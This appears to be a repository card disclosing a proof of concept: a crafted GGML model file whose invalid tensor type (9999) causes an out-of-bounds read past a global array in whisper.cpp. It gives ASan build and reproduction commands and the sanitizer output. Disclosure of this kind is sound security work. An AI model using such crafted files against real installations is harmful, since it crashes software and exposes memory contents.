YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
PoC: Global Buffer OOB Read in whisper.cpp via Invalid Tensor Type
Format: GGML (.bin) Target: whisper.cpp (ggml-org/whisper.cpp) CWE: CWE-125 (Out-of-bounds Read)
Vulnerability
Global buffer OOB read via unchecked tensor type. ttype=9999 indexes past the 40-element ggml_type_traits[] global array, reading arbitrary global memory.
Reproduction
git clone https://github.com/ggml-org/whisper.cpp && cd whisper.cpp
mkdir build-asan && cd build-asan
cmake .. -DCMAKE_C_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
-DCMAKE_CXX_FLAGS="-fsanitize=address,undefined -fno-omit-frame-pointer -g" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address,undefined"
make -j$(nproc)
./bin/whisper-cli -m ../poc_global_oob.bin -f /dev/null
ASAN reports: global-buffer-overflow READ at ggml.c:1272
Tested: whisper.cpp commit 364c77f4
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support